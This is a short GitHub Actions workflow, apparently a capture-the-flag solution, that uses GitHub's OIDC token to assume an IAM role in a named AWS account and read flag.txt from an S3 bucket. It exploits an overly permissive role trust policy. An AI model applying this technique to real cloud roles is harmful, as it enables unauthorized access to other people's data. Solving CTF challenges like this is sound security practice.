name: Exploit CTF Role

on:
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  exploit:
    runs-on: ubuntu-latest

    steps:
      - name: Checkout
        uses: actions/checkout@v4

      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v3
        with:
          role-to-assume: arn:aws:iam::019847485156:role/ctfassumerole
          aws-region: us-east-2
          audience: sts.amazonaws.com

      - name: Retrieve flag
        run: aws s3 cp s3://flagbucket-samplectf/flag.txt -
